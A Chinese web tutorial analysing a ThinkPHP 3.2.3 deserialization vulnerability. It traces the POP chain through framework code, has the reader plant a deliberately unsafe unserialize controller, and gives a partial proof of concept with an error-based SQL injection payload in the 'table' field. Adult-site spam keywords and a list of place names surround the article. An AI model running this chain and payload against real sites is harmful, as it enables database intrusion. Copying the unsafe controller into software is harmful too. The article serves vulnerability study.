最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

Thinkphp3.2.3反序列化漏洞實(shí)例分析

 更新時(shí)間:2023年02月24日 10:11:18   作者:XINO  
這篇文章主要為大家介紹了Thinkphp3.2.3反序列化漏洞實(shí)例分析,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪

前言

ThinkPHP,是為了簡化企業(yè)級應(yīng)用開發(fā)和敏捷WEB應(yīng)用開發(fā)而誕生的開源輕量級PHP框架。隨著框架代碼量的增加,一些潛在的威脅也逐漸暴露,本文給大家?guī)淼氖菍hinkphp3.2.3版本框架里面的反序列化漏洞進(jìn)行分析,淺談原理以及如何應(yīng)用。

魔術(shù)方法

因?yàn)橹耙呀?jīng)講過了,這里就簡單提一下,以下面這個(gè)魔術(shù)方法為例:

_destruct

該方法的作用是,某個(gè)對象的所有引用都被刪除或者當(dāng)對象被顯式銷毀時(shí)執(zhí)行。例如下面代碼:

<?php
class User{
    public function __destruct()
    {
        echo "xino</br>";
    }
}
$test = new User();
$ser = serialize($test);
unserialize($ser);
?>

執(zhí)行后會發(fā)現(xiàn)調(diào)用了魔術(shù)方法,我們要想辦法來尋找代碼之間的關(guān)系來構(gòu)造 反序列化鏈,常見魔術(shù)方法如下:

了解完魔術(shù)方法如何觸發(fā)后便開始我們TP3反序列化漏洞的學(xué)習(xí)之旅。

復(fù)現(xiàn)

這里我是用小皮面板搭建好環(huán)境后開始我們的分析,下面是主界面:

需要在控制器IndexController.class.php 處寫入:

public function index(){
    unserialize(base64_decode($_GET[1]));
}

首先走到Library/Think/Image/Driver/Imagick.class.php ,代碼如下:

 public function __destruct()
    {
        empty($this->img) || $this->img->destroy();
    }
}

這里有一個(gè)可控的變量img,因?yàn)樵撟兞孔呦蛄薲estory(),于是我們尋找一下:

Library/Think/Session/Driver/Memcache.class.php ,該處有個(gè)一樣的方法:

 public function destroy($sessID)
    {
        return $this->handle->delete($this->sessionName . $sessID);
    }

我們會發(fā)現(xiàn)handle和sessionName參數(shù)是可控,因?yàn)樽呦蛄薲elete函數(shù),于是繼續(xù)跟進(jìn)尋找delete,在Mode/Lite/Model.class.php 處:

   public function delete($options = array())
    {
        $pk = $this->getPk();
        if (empty($options) && empty($this->options['where'])) {
            // 如果刪除條件為空 則刪除當(dāng)前數(shù)據(jù)對象所對應(yīng)的記錄
            if (!empty($this->data) && isset($this->data[$pk])) {
                return $this->delete($this->data[$pk]);
            } else {
                return false;
            }
        }
        if (is_numeric($options) || is_string($options)) {
            // 根據(jù)主鍵刪除記錄
            if (strpos($options, ',')) {
                $where[$pk] = array('IN', $options);
            } else {
                $where[$pk] = $options;
            }
            $options          = array();
            $options['where'] = $where;
        }
        // 根據(jù)復(fù)合主鍵刪除記錄
        if (is_array($options) && (count($options) > 0) && is_array($pk)) {
            $count = 0;
            foreach (array_keys($options) as $key) {
                if (is_int($key)) {
                    $count++;
                }
            }
            if (count($pk) == $count) {
                $i = 0;
                foreach ($pk as $field) {
                    $where[$field] = $options[$i];
                    unset($options[$i++]);
                }
                $options['where'] = $where;
            } else {
                return false;
            }
        }
        // 分析表達(dá)式
        $options = $this->_parseOptions($options);
        if (empty($options['where'])) {
            // 如果條件為空 不進(jìn)行刪除操作 除非設(shè)置 1=1
            return false;
        }
        if (is_array($options['where']) && isset($options['where'][$pk])) {
            $pkValue = $options['where'][$pk];
        }
        if (false === $this->_before_delete($options)) {
            return false;
        }
        $result = $this->db->delete($options);		//數(shù)據(jù)庫驅(qū)動類中的delete()
        if (false !== $result && is_numeric($result)) {
            $data = array();
            if (isset($pkValue)) {
                $data[$pk] = $pkValue;
            }
            $this->_after_delete($data, $options);
        }
        // 返回刪除記錄個(gè)數(shù)
        return $result;
    }

這里比較復(fù)雜,需要分析一下,pk,pk,pk,data,$options參數(shù)都是可控的,第二次調(diào)用該函數(shù)后是調(diào)用db(Library/Think/Db/Driver.class.php )里面的函數(shù),進(jìn)去看一下:

$table = $this-&gt;parseTable($options['table']);
$sql   = 'DELETE FROM ' . $table;
return $this-&gt;execute($sql, !empty($options['fetch_sql']) ? true : false);

這里只貼了比較關(guān)鍵的代碼,看到table經(jīng)過parseTable處理之后進(jìn)了sql語句,跟進(jìn)了發(fā)現(xiàn)沒有過濾什么,直接返回了數(shù)據(jù),最后調(diào)用了execute,我們分析其代碼:

 public function execute($str,$fetchSql=false) {
        $this->initConnect(true);
        if ( !$this->_linkID ) return false;
        $this->queryStr = $str;
        if(!empty($this->bind)){
            $that   =   $this;
            $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return '''.$that->escapeString($val).'''; },$this->bind));
        }
        if($fetchSql){
            return $this->queryStr;
        }

看到第二行是一個(gè)初始化連接的代碼,我們跟進(jìn)到最后發(fā)現(xiàn):

 public function connect($config = '', $linkNum = 0, $autoConnection = false)
    {
        if (!isset($this->linkID[$linkNum])) {
            if (empty($config)) {
                $config = $this->config;
            }
            try {
                if (empty($config['dsn'])) {
                    $config['dsn'] = $this->parseDsn($config);
                }
                if (version_compare(PHP_VERSION, '5.3.6', '<=')) {
                    // 禁用模擬預(yù)處理語句
                    $this->options[PDO::ATTR_EMULATE_PREPARES] = false;
                }
                $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['password'], $this->options);
            } catch (\PDOException $e) {
                if ($autoConnection) {
                    trace($e->getMessage(), '', 'ERR');
                    return $this->connect($autoConnection, $linkNum);
                } elseif ($config['debug']) {
                    E($e->getMessage());
                }
            }
        }
        return $this->linkID[$linkNum];
    }

可以通過里面的相應(yīng)代碼:

$this->config

建立數(shù)據(jù)庫連接,整個(gè)的POP鏈跟進(jìn)順序如下:

__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->

因?yàn)闃?gòu)造poc較長,這里只貼關(guān)鍵處,有興趣的小伙伴可以自行去構(gòu)造:

  public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "name where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            ); }

生成后傳入payload即可實(shí)現(xiàn)錯報(bào)注入,體現(xiàn)在payload里就是table這個(gè)語句,經(jīng)過一串的操作使之與數(shù)據(jù)庫連接來執(zhí)行sql語句:

結(jié)語

給大家?guī)砹藅p3的反序列化漏洞分析,主要還是要理清各個(gè)鏈的關(guān)系以及如何讓它們聯(lián)系起來,有興趣的小伙伴可以自己去搭建嘗試,喜歡本文的小伙伴希望可以一鍵三連支持一下。

以上就是Thinkphp3.2.3反序列化漏洞實(shí)例分析的詳細(xì)內(nèi)容,更多關(guān)于Thinkphp 反序列化漏洞的資料請關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

  • 淺析Yii2 GridView 日期格式化并實(shí)現(xiàn)日期可搜索教程

    淺析Yii2 GridView 日期格式化并實(shí)現(xiàn)日期可搜索教程

    這篇文章主要介紹了Yii2 GridView 日期格式化并實(shí)現(xiàn)日期可搜索教程的相關(guān)資料,需要的朋友可以參考下
    2016-04-04
  • 解密ThinkPHP3.1.2版本之獨(dú)立分組功能應(yīng)用

    解密ThinkPHP3.1.2版本之獨(dú)立分組功能應(yīng)用

    分組功能可以解決中大型項(xiàng)目情況中MVC分層文件過多導(dǎo)致不易管理的問題。這篇文章主要介紹了ThinkPHP3.1.2獨(dú)立分組功能,需要的朋友可以參考下
    2014-06-06
  • PHP SESSION跨頁面?zhèn)鬟f失敗解決方案

    PHP SESSION跨頁面?zhèn)鬟f失敗解決方案

    這篇文章主要介紹了PHP SESSION跨頁面?zhèn)鬟f失敗解決方案,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2020-12-12
  • PHP并發(fā)查詢MySQL的實(shí)例代碼

    PHP并發(fā)查詢MySQL的實(shí)例代碼

    本篇文章主要介紹了PHP并發(fā)查詢MySQL的實(shí)例代碼,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過來看看吧
    2017-08-08
  • yii2中添加驗(yàn)證碼的實(shí)現(xiàn)方法

    yii2中添加驗(yàn)證碼的實(shí)現(xiàn)方法

    這篇文章主要介紹了yii2中添加驗(yàn)證碼的實(shí)現(xiàn)方法,實(shí)例分析了Yii2中實(shí)現(xiàn)添加驗(yàn)證碼的具體步驟與相關(guān)功能代碼,需要的朋友可以參考下
    2016-01-01
  • uni-app結(jié)合PHP實(shí)現(xiàn)單用戶登陸demo及解析

    uni-app結(jié)合PHP實(shí)現(xiàn)單用戶登陸demo及解析

    這篇文章主要為大家介紹了uni-app結(jié)合PHP實(shí)現(xiàn)單用戶登陸示例過程詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2023-05-05
  • 用php實(shí)現(xiàn)分頁效果的示例代碼

    用php實(shí)現(xiàn)分頁效果的示例代碼

    分頁效果在網(wǎng)頁中是常見的,可是怎樣才能實(shí)現(xiàn)分頁呢,今天做了兩種方法來實(shí)現(xiàn)一下分頁的效果,本文通過實(shí)例圖文相結(jié)合給大家介紹的非常詳細(xì),需要的朋友參考下吧
    2020-12-12
  • Laravel 4 初級教程之Pages、表單驗(yàn)證

    Laravel 4 初級教程之Pages、表單驗(yàn)證

    本篇教程是本系列的完結(jié)篇,要做的是Pages的詳細(xì)管理功能,表單驗(yàn)證以及命名空間的深度使用,和一個(gè)更好用的通知組件,并且布置一個(gè)簡單的大作業(yè)。
    2014-10-10
  • 微信營銷平臺系統(tǒng)–刮刮樂的開發(fā)

    微信營銷平臺系統(tǒng)–刮刮樂的開發(fā)

    最近一直在做微信相關(guān)的開發(fā)工作,刮刮樂是一個(gè)最常見的微信應(yīng)用了,網(wǎng)上也有很多的教程,本來是不想寫這篇博文的,但又怕網(wǎng)友被坑,我還是寫一下。
    2014-06-06
  • PHP編寫的圖片驗(yàn)證碼類文件分享

    PHP編寫的圖片驗(yàn)證碼類文件分享

    本文給大家匯總介紹了3種php編寫的圖片驗(yàn)證碼類,代碼都非常的簡單實(shí)用,有相同需求的小伙伴可以收藏下。
    2016-06-06

最新評論

文水县| 克什克腾旗| 河池市| 上虞市| 淮北市| 电白县| 金寨县| 福泉市| 涪陵区| 许昌县| 青阳县| 石嘴山市| 垣曲县| 澎湖县| 贡觉县| 大悟县| 视频| 陆良县| 进贤县| 彩票| 浦北县| 泰州市| 台湾省| 抚顺县| 富民县| 浑源县| 德阳市| 集贤县| 上高县| 和硕县| 临泉县| 峨眉山市| 讷河市| 仙游县| 德保县| 梓潼县| 双流县| 新营市| 定兴县| 嫩江县| 罗田县|